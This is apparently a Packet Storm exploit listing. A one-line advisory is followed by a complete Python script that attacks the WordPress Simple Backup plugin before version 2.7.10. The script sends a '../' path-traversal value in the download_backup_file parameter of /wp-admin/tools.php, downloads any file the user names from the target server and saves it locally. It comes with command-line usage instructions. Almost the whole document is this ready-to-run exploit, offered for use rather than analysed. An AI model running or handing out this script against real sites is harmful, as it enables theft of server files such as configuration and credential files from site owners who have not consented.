WordPress Simple Backup plugin versions prior to 2.7.10 suffer from file download and path traversal vulnerabilities.
f57a12da9297027e3773452968be51ac7ced5f4c62bc2a03d3a8a87db3b83fae# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux
import sys
import requests
from urllib.parse import urljoin
import time
def exploit(target_url, file_name, depth):
traversal = '../' * depth
exploit_url = urljoin(target_url, '/wp-admin/tools.php')
params = {
'page': 'backup_manager',
'download_backup_file': f'{traversal}{file_name}'
}
response = requests.get(exploit_url, params=params)
if response.status_code == 200 and response.headers.get('Content-Disposition') \
and 'attachment; filename' in response.headers['Content-Disposition'] \
and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
print(response.text) # Replace with the desired action for the downloaded content
file_path = f'simplebackup_{file_name}'
with open(file_path, 'wb') as file:
file.write(response.content)
print(f'File saved in: {file_path}')
else:
print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python exploit.py <target_url> <file_name> <depth>")
sys.exit(1)
target_url = sys.argv[1]
file_name = sys.argv[2]
depth = int(sys.argv[3])
print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
time.sleep(5)
exploit(target_url, file_name, depth)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed